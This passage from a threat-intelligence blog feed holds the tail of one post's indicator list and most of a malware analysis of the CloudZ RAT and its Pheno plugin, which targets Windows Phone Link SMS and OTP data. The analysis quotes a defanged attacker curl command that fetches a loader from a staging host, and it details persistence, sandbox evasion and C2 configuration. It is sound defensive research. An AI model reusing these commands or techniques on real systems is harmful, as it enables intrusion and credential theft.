66042, 66043, 66040, 66041</li></ul><h2 id="indicators-of-compromise-iocs">Indicators of compromise (IOCs)</h2><p></p><p>IOCs for this threat are also available on our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/tree/main/2026/05" rel="noreferrer">here</a>.</p><p><strong>NetDraft, FringePorch</strong></p>
<!--kg-card-begin: html-->
<pre>
1139b39d3cc151ddd3d574617cf113608127850197e9695fef0b6d78df82d6ca
Ee56c49f42522637f401d15ac2a2b6f3423bfb2d5d37d071f0172ce9dc688d4b
51f0cf80a56f322892eed3b9f5ecae45f1431323600edbaea5cd1f28b437f6f2
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>VSHELL</strong></p>
<!--kg-card-begin: html-->
<pre>
35b2a5260b21ddb145486771ec2b1e4dc1f5b7f2275309e139e4abc1da0c614b
199bd156c81b2ef4fb259467a20eacaa9d861eeb2002f1570727c2f9ff1d5dab
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>ZingDoor</strong></p>
<!--kg-card-begin: html-->
<pre>
071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Gogo</strong></p>
<!--kg-card-begin: html-->
<pre>
E74098b17d5d95e0014cf9c7f41f2a4e4be8baefc2b0eb42d39ae05a95b08ea5
2b627f6afe1364a7d0d832ccba87ef33a8a39f30a70a5f395e2a3cb0e2161cb3
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Stowaway</strong></p>
<!--kg-card-begin: html-->
<pre>
7c593ca40725765a0747cc3100b43a29b88ad1708ef77e915ab02686c0153001
F859a67ceebc52f0770a222b85a5002195089ee442eac4bea761c29be994e2ea
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>anyproxy</strong></p>
<!--kg-card-begin: html-->
<pre>
7d9c70fc36143eb33583c30430dcb40cf9d306067594cc30ffd113063acd6292
</pre>
<!--kg-card-end: html-->
<p>&#xA0;&#xA0;<strong>QScan</strong></p>
<!--kg-card-begin: html-->
<pre>
1bb59491f7289b94ab0130d7065d74d2459a802a7550ebf8cd0828f0a09c4d38
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Draculoader</strong></p>
<!--kg-card-begin: html-->
<pre>
843f8aea7842126e906cadbad8d81fa456c184fb5372c6946978a4fe115edb1c
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Dddd</strong></p>
<!--kg-card-begin: html-->
<pre>
343105919aa6df8a75ecb8b06b74f23a7d3e221fca56c67b728c50ea141314bc
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Httpx</strong></p>
<!--kg-card-begin: html-->
<pre>
4109f15056414f25140c7027092953264944664480dd53f086acb8e07d9fccab
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>SoftEther VPN</strong></p>
<!--kg-card-begin: html-->
<pre>
3dec6703b2cbc6157eb67e80061d27f9190c8301c9dd60eb0be1e8b096482d7e
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>SharpGetUserLogin</strong></p>
<!--kg-card-begin: html-->
<pre>
9f115e9b32111e4dc29343a2671ab10a2b38448657b24107766dc14ce528fceb
B19bfca2fc3fdabf0d0551c2e66be895e49f92aedac56654b1b0f51ec66e7404
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Naabu</strong></p>
<!--kg-card-begin: html-->
<pre>
45cd169bf9cd7298d972425ad0d4e98512f29de4560a155101ab7427e4f4123f
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>PortQry</strong></p>
<!--kg-card-begin: html-->
<pre>
Fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00
</pre>
<!--kg-card-end: html-->
<p>&#xA0;&#xA0;</p><p><strong>Network IOCs</strong></p>
<!--kg-card-begin: html-->
<pre>
hxxps[://]www[.]drivelivelime[.]com
hxxps[://]www[.]drivelivelime[.]com/x
hxxps[://]www[.]drivelivelime[.]com/pw
www[.]drivelivelime[.]com
&#xA0;
hxxps[://]msiidentity[.]com
hxxps[://]msiidentity[.]com/pw
msiidentity[.]com
&#xA0;
hxxp[://]trafficmanagerupdate[.]com/index[.]php
trafficmanagerupdate[.]com
&#xA0;
image[.]update-kaspersky[.]workers[.]dev
update-kaspersky[.]workers[.]dev
&#xA0;
85[.]209[.]156[.]3
85[.]209[.]156[.]3:56456
85[.]209[.]156[.]3:46389
hxxp[://]85[.]209[.]156[.]3:8080/wagent[.]exe
hxxp[://]85[.]209[.]156[.]3:8082/wagent[.]exe
&#xA0;
&#xA0;
185[.]238[.]189[.]41
hxxp[://]185[.]238[.]189[.]41:8080&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;
&#xA0;
103[.]27[.]108[.]55
hxxp[://]103[.]27[.]108[.]55:48265/
&#xA0;
hxxp[://]38[.]54[.]32[.]244/Rar[.]exe
38[.]54[.]32[.]244
&#xA0;
45[.]140[.]168[.]62
88[.]151[.]195[.]133
156[.]238[.]224[.]82
45[.]135[.]135[.]100
</pre>
<!--kg-card-end: html-->
]]></content:encoded></item><item><title><![CDATA[CloudZ RAT potentially steals OTP messages using Pheno plugin]]></title><description><![CDATA[Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”]]></description><link>https://blog.talosintelligence.com/cloudz-pheno-infostealer/</link><guid isPermaLink="false">69f888cc594fe50001380f86</guid><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[RAT]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><category><![CDATA[Cisco Talos DNS Security]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><dc:creator><![CDATA[Alex Karkins]]></dc:creator><pubDate>Tue, 05 May 2026 10:00:18 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_spotlight.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos&#xA0;discovered&#xA0;an intrusion,&#xA0;active since&#xA0;at least&#xA0;January 2026,&#xA0;where an unknown attacker implanted a CloudZ remote access&#xA0;tool (RAT)&#xA0;and&#xA0;a previously undocumented plugin called &#x201C;Pheno.&#x201D;</li><li>According to the functionalities of the&#xA0;CloudZ&#xA0;RAT and&#xA0;Pheno&#xA0;plugin, this was&#xA0;with&#xA0;the&#xA0;intention&#xA0;of stealing&#xA0;victims&#x2019;&#xA0;credentials and&#xA0;potentially&#xA0;one-time passwords&#xA0;(OTPs).&#xA0;</li><li>CloudZ&#xA0;utilizes&#xA0;the custom&#xA0;Pheno&#xA0;plugin&#xA0;to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application, allowing&#xA0;the plugin&#xA0;to continuously scan for active Phone Link processes and potentially intercept sensitive mobile data like SMS and OTPs without deploying malware on the phone.&#xA0;</li><li>CloudZ&#xA0;evades detection by executing critical malicious functions dynamically in system memory and performing checks to avoid debuggers and sandbox environments.&#xA0;</li></ul><h2 id="attacker-abuses-the-windows-phone-link-application">Attacker abuses&#xA0;the Windows Phone Link application&#xA0;</h2><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_spotlight.jpg" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin"><p>Windows Phone Link (formerly&#xA0;&quot;Your Phone&quot;) is a synchronization tool developed by Microsoft and built directly into Windows 10 and 11 that bridges a PC and a smartphone (Android or iPhone).&#xA0;By&#xA0;establishing&#xA0;a secure connection via Wi-Fi and Bluetooth, the application mirrors essential phone activities&#xA0;(such as&#xA0;application&#xA0;notifications and&#xA0;SMS&#xA0;messages)&#xA0;onto the computer screen, reducing&#xA0;the user&#x2019;s&#xA0;need to physically&#xA0;interact with the&#xA0;mobile device&#xA0;while working on the computer.&#xA0;The&#xA0;Phone Link application writes&#xA0;synchronized&#xA0;phone data such as SMS messages, call&#xA0;logs,&#xA0;and the application&#xA0;notification&#xA0;history&#xA0;to the Windows PC in the application&#x2019;s SQLite database file.&#xA0;</p><p>Talos observed that&#xA0;during an intrusion,&#xA0;an attacker&#xA0;attempted&#xA0;to abuse the Windows Phone Link application using the&#xA0;CloudZ&#xA0;RAT&#xA0;and its&#xA0;Pheno&#xA0;plugin. The&#xA0;Pheno&#xA0;plugin is designed&#xA0;to&#xA0;monitor&#xA0;an active PC-to-phone bridge&#xA0;established&#xA0;by the Phone Link application on the victim machine.&#xA0;With a confirmed Phone Link activity on the victim&apos;s machine, the attacker&#xA0;using the&#xA0;CloudZ&#xA0;RAT&#xA0;can&#xA0;potentially&#xA0;intercept&#xA0;the Phone Link application&#x2019;s&#xA0;SQLite database file&#xA0;(e.g.,&#xA0;&#x201C;PhoneExperiences-*.db&#x201D;)&#xA0;on the victim machine,&#xA0;potentially&#xA0;compromising&#xA0;SMS-based OTP&#xA0;messages&#xA0;and other authenticator application notification messages.&#xA0;</p><h2 id="intrusion-summary-of-cloudz-infection">Intrusion summary of&#xA0;CloudZ&#xA0;infection&#xA0;</h2><p>Talos discovered from telemetry data that the intrusion had begun with an unknown&#xA0;initial&#xA0;access&#xA0;vector&#xA0;to the victim&apos;s environment, which&#xA0;led to the execution of a fake&#xA0;ScreenConnect&#xA0;application update executable.&#xA0;This malicious executable drop&#xA0;and executes&#xA0;an intermediate .NET loader executable, which&#xA0;subsequently&#xA0;deploys&#xA0;the modular&#xA0;CloudZ&#xA0;on the victim&#x2019;s machine. Upon execution, the RAT&#xA0;decrypts&#xA0;its configuration data,&#xA0;establishes&#xA0;an encrypted socket connection to the&#xA0;command-and-control (C2)&#xA0;server, and&#xA0;enters its command dispatcher mode.&#xA0;&#xA0;&#xA0;</p><p>CloudZ&#xA0;facilitates the&#xA0;C2&#xA0;commands to exfiltrate credentials from the&#xA0;victim&#xA0;machine browser data, and it downloads and implants a plugin.&#xA0;The plugin performs reconnaissance of&#xA0;the&#xA0;Microsoft Phone Link application on the victim machine and writes the&#xA0;reconnaissance&#xA0;data to an output file in a staging folder.&#xA0;CloudZ&#xA0;reads back the Phone Link application data from the staging folder and sends it to the C2 server.&#xA0;</p><h2 id="rust-compiled-executable-used-as-a-dropper">Rust-compiled executable used as a dropper&#xA0;</h2><p>Talos discovered a Rust-compiled 64-bit executable,&#xA0;disguised with file&#xA0;names&#xA0;such as&#xA0;&#x201C;systemupdates.exe&#x201D;&#xA0;or&#xA0;&#x201C;Windows-interactive-update.exe&#x201D;,&#xA0;functioning as a&#xA0;loader. The malicious&#xA0;loader&#xA0;was compiled on Jan.&#xA0;1, 2026, and has&#xA0;the&#xA0;developer string of&#xA0;<code>rustextractor.pdb</code>.&#xA0;</p><p>When&#xA0;the loader is run on the victim machine, it decrypts&#xA0;and drops&#xA0;an&#xA0;embedded .NET loader binary disguised as a text file with the file names&#xA0;&#x201C;update.txt&#x201D; or &#x201C;msupdate.txt&#x201D; in the folder &#x201C;C:\ProgramData\Microsoft\windosDoc\&#x201D;.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-ccac0ae2-99ab-4114-a0be-c3ab035942cb-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="128" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-ccac0ae2-99ab-4114-a0be-c3ab035942cb-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-ccac0ae2-99ab-4114-a0be-c3ab035942cb-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 1. Excerpt of rusty dropper code. </span></figcaption></figure><p>In another instance,&#xA0;Talos&#xA0;observed&#xA0;that&#xA0;the .NET&#xA0;loader&#xA0;was implanted&#xA0;in the victim machine&#xA0;by downloading&#xA0;it&#xA0;from an attacker-controlled staging server using the command shown below:&#xA0;&#xA0;</p>
<!--kg-card-begin: html-->
<pre>curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update[.]txt hxxps[://]calm-wildflower-1349[.]hellohiall[.]workers[.]dev</pre>
<!--kg-card-end: html-->
<p>The dropper executes&#xA0;an embedded PowerShell script&#xA0;to&#xA0;establish&#xA0;persistence&#xA0;on the victim machine&#xA0;through a Windows task&#xA0;which&#xA0;executes the dropped malicious&#xA0;.NET&#xA0;loader.&#xA0;The PowerShell script achieves it by initially performing&#xA0;a runtime check to&#xA0;determine&#xA0;whether the dropped&#xA0;.NET&#xA0;loader is already active on the system. It queries all running processes using the&#xA0;<code>Get-CimInstance Win32_Process</code> command and filters for any instance of&#xA0;<code>regasm.exe</code>&#xA0;with the&#xA0;command line&#xA0;parameters that&#xA0;include&#xA0;the string&#xA0;<code>update.txt</code>. If such an instance is found, the script silently exits without taking any action.&#xA0;</p><p>If the check&#xA0;indicates&#xA0;that the&#xA0;.NET&#xA0;loader is not running, the script proceeds to&#xA0;establish&#xA0;persistence by creating a scheduled task named&#xA0;<code>SystemWindowsApis</code>&#xA0;in the scheduled task folder&#xA0;<code>\Microsoft\Windows\</code>. It configures the task to trigger at system startup&#xA0;<code>/sc onstart</code>, execute under the SYSTEM account&#xA0;<code>/ru SYSTEM</code> with the highest privilege level&#xA0;<code>/rl HIGHEST</code>, and the&#xA0;<code>/f </code>flag ensures it will silently overwrite any existing task with the same name, allowing the malware to update its persistence mechanism. The script configures the task scheduler action to run the&#xA0;.NET&#xA0;loader by&#xA0;utilizing&#xA0;the living-off-the-land binary (LOLBin)&#xA0;regasm.exe,&#xA0;which is the&#xA0;.NET&#xA0;Framework Assembly Registration Utility&#xA0;located&#xA0;at&#xA0;&#x201C;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\&#x201D;.&#xA0;It provides the path of the dropped&#xA0;.NET&#xA0;loader as the argument to regasm.exe with the&#xA0;<code>/nologo</code> flag. After creating the task, the script&#xA0;immediately&#xA0;triggers it with&#xA0;<code>schtasks /run</code>,&#xA0;ensuring it executes&#xA0;immediately&#xA0;and survives future reboots.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4b8aab16-162b-4fa6-80a4-1e6de336e095.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="172" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-4b8aab16-162b-4fa6-80a4-1e6de336e095.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4b8aab16-162b-4fa6-80a4-1e6de336e095.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 2. Excerpt of the PowerShell script to&#xA0;establish&#xA0;persistence&#xA0;on victim&#xA0;machines.&#xA0;</span></figcaption></figure><h2 id="net-loader-implants-the-cloudz-rat">.NET loader implants the&#xA0;CloudZ&#xA0;RAT&#xA0;</h2><p>Talos&#xA0;found that&#xA0;the&#xA0;attacker embedded&#xA0;CloudZ,&#xA0;an encrypted .NET-compiled RAT,&#xA0;in the .NET loader executable.&#xA0;</p><p>When the .NET loader is triggered through the Windows task scheduler, it performs the detection evasion checks beginning with a&#xA0;timing-based&#xA0;evasion check, where it calculates the actual elapsed time of a sleep command to detect if it is executed in&#xA0;the analysis&#xA0;environment. It then performs enumeration of running processes in the victim machine against a list of security tools,&#xA0;including network sniffers like Wireshark and Fiddler, as well as&#xA0;system monitors like&#xA0;Procmon&#xA0;and Sysmon.&#xA0;The .NET loader&#xA0;exits&#xA0;the execution if&#xA0;these&#xA0;are detected in the victim environment.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-ab8d36d3-1cf4-40a8-88c2-afb90311d328-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="597" height="569"><figcaption><span style="white-space: pre-wrap;">Figure 3. Excerpt of the .NET loader binary with&#xA0;detection&#xA0;evasion instructions. </span></figcaption></figure><p>The loader then&#xA0;conducts&#xA0;hardware&#xA0;and environment&#xA0;checks to&#xA0;identify&#xA0;virtual&#xA0;machine&#xA0;(VM) or sandbox characteristics. It verifies that the system has at least two processor cores and searches for strings like &#x201C;VIRTUAL&#x201D; or &#x201C;SANDBOX&#x201D; within the system directory path, computer name, user domain, and the current victim username.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4f181cb2-c6a4-4778-bea0-3f9aba4f0171-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="479" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-4f181cb2-c6a4-4778-bea0-3f9aba4f0171-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4f181cb2-c6a4-4778-bea0-3f9aba4f0171-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 4. Excerpt of the .NET loader binary with&#xA0;detection&#xA0;evasion instructions.&#xA0;</span></figcaption></figure><p>The loader executable is embedded with multiple chunks of the hexadecimal strings in the binary,&#xA0;which are concatenated sequentially during the&#xA0;execution, reassembling a massive hexadecimal data blob. The loader converts the hexadecimal strings to bytes and performs bytewise XOR decryption using the key hexadecimal (0xCA). If the decrypted payload is a .NET assembly, the loader will&#xA0;reflectively run. Otherwise, it writes the decrypted payload to the folder&#xA0;&#x201C;%TEMP%\{GUID}&#x201D;&#xA0;and runs it as a process.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-7b576885-e278-4995-b620-cfcd70ddc7b6-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="468" height="369"><figcaption><span style="white-space: pre-wrap;">Figure 5. Excerpt of the .NET loader to execute the .NET payload module.&#xA0;</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-175f3759-73a7-4a14-a04e-e6a9e89681bd-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="472" height="330"><figcaption><span style="white-space: pre-wrap;">Figure 6. Excerpt of the .NET loader to execute the&#xA0;non .NET&#xA0;payload executables.&#xA0;</span></figcaption></figure><h2 id="modular-cloudz-rat-delivered-as-payload">Modular&#xA0;CloudZ&#xA0;RAT delivered as payload&#xA0;</h2><p>Talos discovered&#xA0;that&#xA0;a&#xA0;CloudZ, a modular RAT,&#xA0;is delivered as the payload in the current intrusion.&#xA0;CloudZ&#xA0;is a .NET executable&#xA0;compiled on Jan.&#xA0;13,&#xA0;2026, and is obfuscated with&#xA0;ConfuserEx&#xA0;obfuscation.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-7330e287-bcbc-40c7-9a30-0dea576c83ec-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="365" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-7330e287-bcbc-40c7-9a30-0dea576c83ec-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-7330e287-bcbc-40c7-9a30-0dea576c83ec-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 7. The RAT binary&#xA0;shows&#xA0;the malware name,&#xA0;CloudZ.&#xA0;</span></figcaption></figure><p>CloudZ&#xA0;employs layers of defense against&#xA0;the&#xA0;analysis&#xA0;environments and reverse engineering.&#xA0;It queries the&#xA0;<code>_ENABLE_PROFILING</code>&#xA0;environment variable via&#xA0;<code>GetEnvironmentVariable</code>&#xA0;Windows API to detect whether a .NET profiler or debugger is attached to the&#xA0;RAT&#xA0;process&#xA0;on the victim machine.&#xA0;It uses the .NET method &#x201C;System.Reflection.Emit.DynamicMethod&#x201D; combined with &#x201C;ILGenerator&#x201D;&#xA0;method&#xA0;to create the executable&#xA0;functions&#xA0;dynamically during the RAT execution.&#xA0;</p><p>The operation of&#xA0;CloudZ&#xA0;utilizes its configuration data, which is embedded in the binary, as a resource that it decrypts and loads into memory during execution. The decrypted configuration data includes various C2 commands, PowerShell scripts for data&#xA0;archive&#xA0;extraction, multiple file download methods, paths and names of staging folders, multiple HTTP headers, and the URLs of the staging servers.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-9bfc77e6-7f39-42a7-8943-01e13b712c99-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="337" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-9bfc77e6-7f39-42a7-8943-01e13b712c99-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-9bfc77e6-7f39-42a7-8943-01e13b712c99-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;7.&#xA0;CloudZ&#xA0;primary configuration data decrypted in memory.&#xA0;</span></figcaption></figure><p>After the decryption of the configuration&#xA0;data,&#xA0;CloudZ&#xA0;decodes the&#xA0;Base64-encoded strings to get the&#xA0;URL of the&#xA0;staging&#xA0;server&#xA0;where the&#xA0;secondary configuration is&#xA0;stored.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-d3405fc7-ff79-4036-8ad6-e378133308cf-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="590" height="334"><figcaption><span style="white-space: pre-wrap;">Figure 8.&#xA0;CloudZ&#xA0;function that downloads the&#xA0;secondary configuration data from the staging server.&#xA0;</span></figcaption></figure><p>Talos&#xA0;found that the RAT&#xA0;downloads and processes secondary configuration data through the URLs &#x201C;hxxps[://]round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370&#x201D; or&#xA0;&quot;https[://]pastebin[.]com/raw/8pYAgF0Z?t=1771833517&quot;&#xA0;and extracts&#xA0;the C2 server IP address&#xA0;&#x201C;185[.]196[.]10[.]136&#x201D;&#xA0;and port number 8089, establishing connections through TCP sockets.&#xA0;</p><p>Pivoting on the Pastebin&#xA0;URL&#xA0;indicator, we found that the attacker used&#xA0;the Pastebin handler name &#x201C;HELLOHIALL&#x201D;&#xA0;and&#xA0;hosted the secondary configuration data at several Pastebin URLs.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-e4aef1e1-50b1-47dd-9e39-101e32c835ca.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="173" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-e4aef1e1-50b1-47dd-9e39-101e32c835ca.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-e4aef1e1-50b1-47dd-9e39-101e32c835ca.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 9. Attacker-controlled&#xA0;Pastebin&#xA0;hosting the secondary configuration data. </span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-284a4025-8da9-4b3e-9fc1-9e4c258e1e0d.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="238" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-284a4025-8da9-4b3e-9fc1-9e4c258e1e0d.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-284a4025-8da9-4b3e-9fc1-9e4c258e1e0d.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 10. Attacker&#x2019;s&#xA0;Pastebin&#xA0;account&#xA0;hosting&#xA0;multiple nodes&#xA0;of secondary&#xA0;configuration data.&#xA0;</span></figcaption></figure><p>The RAT rotates between three hardcoded&#xA0;user-agent strings to blend its HTTP traffic with the legitimate browser requests&#xA0;of the victim machine. Every HTTP request includes anti-caching headers consisting of &#x201C;Cache-Control: no-cache, no-store, must-revalidate&quot;, &#x201C;Pragma: no-cache&quot;, and &#x201C;Expires: 0&#x201D;, which prevents intermediate proxies and CDN infrastructure from caching C2&#xA0;or the&#xA0;staging server&#xA0;details.&#xA0;&#xA0;</p><p>User-agent headers used by the&#xA0;CloudZ&#xA0;are:&#xA0;</p><ul><li>Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0&#xA0;</li><li>Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1&#xA0;</li><li>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36&#xA0;</li></ul><p>After the RAT&#xA0;establishes&#xA0;the C2 connection, it enters the command dispatcher module that relies on a decrypted&#xA0;configuration&#xA0;data loaded into memory. The configuration data&#xA0;contains&#xA0;Base64-encoded command&#xA0;identifiers&#xA0;which the RAT&#xA0;matches&#xA0;against&#xA0;the commands received from the C2 server to perform the&#xA0;several&#xA0;functionalities. The commands&#xA0;facilitated&#xA0;by&#xA0;CloudZ&#xA0;are&#xA0;shown in the table&#xA0;below:&#xA0;</p>
<!--kg-card-begin: html-->
<table class="Table Ltr TableWordWrap SCXW93055062 BCX4" border="1" dir="ltr" data-tablestyle="MsoTableGrid" data-tablelook="1696" aria-rowcount="19" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; table-layout: fixed; width: 1px; border-collapse: collapse; empty-cells: show; position: relative; overflow: visible; background: none; border-spacing: 0px;"><tbody class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text;"><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="1" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstRow FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="274226022" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{73}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>Base64</b></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">-e</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal 